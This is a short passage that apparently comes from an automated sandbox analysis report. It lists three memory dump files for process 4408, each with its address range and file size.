                                                                                        • memory/4408-14-0x00007FFAAEC50000-0x00007FFAAF712000-memory.dmp

                                                                                          Filesize

                                                                                          10.8MB

                                                                                        • memory/4408-2-0x00007FFAAEC53000-0x00007FFAAEC55000-memory.dmp

                                                                                          Filesize

                                                                                          8KB

                                                                                        • memory/4408-12-0x000002A04FD70000-0x000002A04FD92000-memory.dmp

                                                                                          Filesize

                                                                                          136KB